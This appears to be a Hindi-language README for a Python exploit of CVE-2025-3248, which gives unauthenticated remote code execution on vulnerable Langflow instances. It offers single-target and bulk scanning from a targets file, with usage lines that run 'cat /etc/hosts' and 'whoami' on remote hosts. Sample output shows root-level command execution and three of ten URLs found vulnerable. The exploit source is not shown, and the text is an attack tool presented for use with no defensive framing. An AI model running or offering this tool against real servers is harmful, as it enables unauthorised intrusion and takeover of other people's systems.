
CVE-2025-3248 के लिए Python-आधारित शोषण जो कमजोर Langflow इंस्टेंस पर दूरस्थ कोड निष्पादन सक्षम करता है। एकल URL और बल्क स्कैनिंग का समर्थन करता है, स्वचालित कमजोरी पहचान और कमांड निष्पादन के साथ।
CVE-2025-3248 के लिए Python-आधारित शोषण, जो दूरस्थ और अप्रमाणित हमलावरों को तैयार HTTP अनुरोधों के माध्यम से कमजोर Langflow इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देता है।
python CVE-2025-3248.py http://target-url -c "cat /etc/hosts"
python CVE-2025-3248.py -f targets.txt
python CVE-2025-3248.py -f targets.txt -c "whoami"
[*] Progress: 1/10 URLs checked
[*] Checking https://example.com
[+] Vulnerable - Command Output:
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
[*] Scan Summary:
[+] Total URLs checked: 10
[+] Vulnerable URLs: 3
[+] Not Vulnerable URLs: 7
[*] Total scan time: 25.34s
[*] Results saved to files with timestamp